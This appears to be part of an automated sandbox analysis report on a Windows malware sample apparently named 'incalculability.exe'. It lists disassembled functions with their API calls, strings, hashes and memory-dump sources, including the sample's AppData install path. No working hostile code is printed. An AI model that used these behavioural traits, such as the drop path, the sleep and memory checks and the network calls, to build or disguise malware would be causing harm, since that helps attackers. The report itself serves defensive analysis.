                            • Opcode ID: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                            • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                            • Opcode Fuzzy Hash: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                            • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                            Function 0044F082 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 161COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: _memmove
                            • String ID: \$h
                            • API String ID: 4104443479-677774858
                            • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                            • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                            • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                            • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                            Function 0043999F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: _memcmp
                            • String ID: &
                            • API String ID: 2931989736-1010288
                            • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                            • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                            • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                            • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                            Function 0044D3D5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: _memmove
                            • String ID: \
                            • API String ID: 4104443479-2967466578
                            • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                            • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                            • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                            • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                            Function 004667E1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114networkCOMMON
                            Download Yara Rule
                            APIs
                            • _wcslen.LIBCMT ref: 00466825
                            • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: CrackInternet_wcslen
                            • String ID: |
                            • API String ID: 596671847-2343686810
                            • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                            • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                            • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                            • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                            Function 0044835A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: MessageSend
                            • String ID: '
                            • API String ID: 3850602802-1997036262
                            • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                            • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                            • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                            • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                            Function 0040F850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
                            Download Yara Rule
                            APIs
                            • _strlen.LIBCMT ref: 0040F858
                              • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                              • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                            • _sprintf.LIBCMT ref: 0040F9AE
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: _memmove$_sprintf_strlen
                            • String ID: %02X
                            • API String ID: 1921645428-436463671
                            • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                            • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                            • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                            • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                            Function 00451006 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: MessageSend
                            • String ID: Combobox
                            • API String ID: 3850602802-2096851135
                            • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                            • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                            • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                            • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                            Function 00451321 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: LengthMessageSendTextWindow
                            • String ID: edit
                            • API String ID: 2978978980-2167791130
                            • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                            • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                            • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                            • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                            Function 00476CA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72sleepCOMMON
                            Download Yara Rule
                            APIs
                            • Sleep.KERNEL32(00000000), ref: 00476CB0
                            • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: GlobalMemorySleepStatus
                            • String ID: @
                            • API String ID: 2783356886-2766056989
                            • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                            • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                            • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                            • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                            Function 00465225 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: htonsinet_addr
                            • String ID: 255.255.255.255
                            • API String ID: 3832099526-2422070025
                            • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                            • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                            • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                            • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                            Function 0044256C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59networkCOMMON
                            Download Yara Rule
                            APIs
                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: InternetOpen
                            • String ID: <local>
                            • API String ID: 2038078732-4266983199
                            • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                            • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                            • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                            • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                            Function 004321A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: __fread_nolock_memmove
                            • String ID: EA06
                            • API String ID: 1988441806-3962188686
                            • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                            • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                            • Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                            • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                            Function 00442BB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: _memmove
                            • String ID: u,D
                            • API String ID: 4104443479-3858472334
                            • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                            • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                            • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                            • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                            Function 004560F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                            • wsprintfW.USER32 ref: 0045612A
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: MessageSend_mallocwsprintf
                            • String ID: %d/%02d/%02d
                            • API String ID: 1262938277-328681919
                            • Opcode ID: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                            • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                            • Opcode Fuzzy Hash: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                            • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                            Function 00442651 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22networkCOMMON
                            Download Yara Rule
                            APIs
                            • InternetCloseHandle.WININET(?), ref: 00442663
                            • InternetCloseHandle.WININET ref: 00442668
                              • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: CloseHandleInternet$ObjectSingleWait
                            • String ID: aeB
                            • API String ID: 857135153-906807131
                            • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                            • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                            • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                            • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                            Function 00433244 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            • ^B, xrefs: 00433248
                            • C:\Users\user\AppData\Local\inhumate\incalculability.exe, xrefs: 0043324B
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: _wcsncpy
                            • String ID: ^B$C:\Users\user\AppData\Local\inhumate\incalculability.exe
                            • API String ID: 1735881322-3762084193
                            • Opcode ID: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                            • Instruction ID: 95fca152a805ab331260cabc3645652019b64b11bc5d0d7a1f408bc65d2df1f2
                            • Opcode Fuzzy Hash: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                            • Instruction Fuzzy Hash: ADE0C23360051A7B9710DE4AD841DBBF37DEEC4A20B08802AF90883200E2B1BD1A43E4
                            Function 00441BE8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                            Download Yara Rule
                            APIs
                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                            • PostMessageW.USER32(00000000), ref: 00441C05
                              • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                            Strings
                            Memory Dump Source
